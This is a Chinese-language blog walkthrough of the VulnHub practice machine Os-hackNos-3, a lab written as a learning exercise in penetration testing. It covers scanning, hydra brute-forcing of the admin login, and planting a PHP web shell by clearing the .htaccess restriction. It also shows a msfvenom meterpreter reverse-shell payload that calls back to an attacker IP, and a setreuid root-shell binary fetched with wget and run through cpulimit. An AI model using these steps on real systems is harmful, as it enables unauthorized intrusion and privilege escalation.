首页 > 其他分享 >vulnhub靶场Os-hackNos-3

vulnhub靶场Os-hackNos-3

时间:2022-11-17 21:46:28浏览次数:78  
标签:文件 编译 网站 hackNos 192.168 访问 vulnhub 靶场 Os

0x000 靶场描述


难度:中级
flag:2 个flag第一个用户和第二个root
学习:Web 应用程序|枚举|权限提升
网站: www.hacknos.com
联系我们 : @rahul_gehlaut


0x001 靶场下载


https://www.vulnhub.com/entry/hacknos-os-hacknos-3,410/


0x002 信息收集


探测存活主机

sudo netdiscover -r 192.168.1.0/24

探测存活主机

端口扫描

nmap -sS -sV -Pn -A -p 1-65535 192.168.1.100

端口扫描

访问网站,发现页面下方有提示

网站

目录扫描

对websec目录下再进行扫描,发现网站后台,访问之后发现账号是邮箱格式的,在目录扫描结果中发现有1.sql文件,尝试访问。

目录扫描

发现存在一个邮箱

email

使用hydra爆破后台密码

爆破之前,先用cewl对网站进行爬取,从而生成密码字典

这里不能使用burpsuite进行抓包爆破。

hydra


0x003 修改主题文件getshell


使用账号密码登陆网站后台

后台主页

主题文件

访问 http://192.168.1.100/websec/themes/gila-blog/shell.php ,发现拒绝访问。

查看发现.htaccess文件拒绝访问.php后缀的文件,把.htaccess文件内容清除即可。

htaccess

使用蚁剑连接,成功上线。

蚁剑

利用蚁剑上线msf

先使用命令生成一个elf文件,并将其通过蚁剑上传到目标服务器

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.106 LPORT=7777 -f elf -o reverse.elf

然后kali上开启msfconsole监听,成功上线

切换交互式shell。

python3 -c 'import pty;pty.spawn("/bin/bash")'

msfconsole


0x004 利用cpulimit提权


利用如下命令查找具有suid权限的命令

find /bin/bash -perm -u=s -type f 2>/dev/null

find

通过网站 https://gtfobins.github.io/ 可以查看命令的详细使用方法。

cpulimit

先写一个 test.c 文件,然后进行编译

这里尽量使用低版本进行编译,kali 2022版本编译的文件会导致提权失败。。。

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc,char *argv[])
{
	setreuid(0,0);
	execve("/bin/bash",NULL,NULL);
}

编译为可执行文件

gcc test.c -o exp

利用如下命令下载到服务器,然后使用cpulimit命令进行提权

wget http://192.168.1.105/exp

cpulimit


0x005 查找flag


还是老地方,用户目录下的user.txt和root目录下的root.txt

flag

标签:文件,编译,网站,hackNos,192.168,访问,vulnhub,靶场,Os
From: https://www.cnblogs.com/Cx330Lm/p/16901080.html

相关文章

  • UOS本地源配置
    创建iso挂载点:root@Ispsrv:~#mkdir/mnt/uos配置永久挂载:root@Ispsrv:~#vi/etc/fstab#添加内容/dev/cdrom/mnt/uosiso9660defaults00挂载全部:root@Ispsrv:~#mount......
  • 关于PowerShell -Verbose 改变 $ErrorActionPreference 的 Bug
    问题我们定义一个function,当我们尝试删除一个不存在的文件,但是不希望有错误出现我们这么写,一切符合预期但是,我们同时希望能记录删除操作的一些信息,我们加上-verbose通......
  • 【MacOs】Go语言环境搭建
    一、下载安装Go官网下载地址:https://golang.org/dl/Go官方镜像站(推荐):https://golang.google.cn/dl/选择对应的版本:M系列(ARM64)|Inter(x86-64),双击安装,安装后查看: ......
  • CentOS检查和禁用transparent hugepages
    1.查看系统当前使用的匿名透明大页#grep-iAnonHugePages/proc/meminfoAnonHugePages:1216512kB2.查看哪些应用在使用匿名透明大页$sudoawk'/AnonHugePag......
  • Centos开放端口
    开启防火墙systemctlstartfirewalld开放某个端口firewall-cmd--zone=public--add-port=6379/tcp--permanent其中zone表示作用域,参数permanent表示永久生效......
  • Centos7 SRS直播服务器搭建
    安装git工具,然后进行安装yum-yinstallgitgitclone-b4.0releasehttps://gitee.com/ossrs/srs.gitcdsrs/trunk./configuremake./objs/srs-cconf/s......
  • postgis simplify(简化线、抽稀函数)
    1.【postgis】抽希函数st_simplify、ST_SimplifyPreserveTopology:https://blog.csdn.net/flowerspring/article/details/1062556502.使用PostGIS简化相邻的多边形?:https:......
  • 定制Centos8的图形用户界面之定制图形元素
    解压install.img之后。挂载squashfs-root/LiveOS/rootfs.img到一个空文件夹安装程序的可自定义图形元素存储在安装程序运行时文件系统的 /usr/share/anaconda/pixmaps/ ......
  • ASEMI代理力特LSIC1MO120E0080碳化硅MOSFET
    编辑-Z力特碳化硅MOS管LSIC1MO120E0080参数:型号:LSIC1MO120E0080漏极-源极电压(VDS):1200V连续漏电流(ID):25A功耗(PD):214W工作结温度(TJ):-55to+175℃零栅极电压漏极电流(IDSS......
  • ASEMI代理力特LSIC1MO120E0080碳化硅MOSFET
    编辑-Z力特碳化硅MOS管LSIC1MO120E0080参数:型号:LSIC1MO120E0080漏极-源极电压(VDS):1200V连续漏电流(ID):25A功耗(PD):214W工作结温度(TJ):-55to+175℃零栅极电压漏极电流(IDSS):1uA漏极......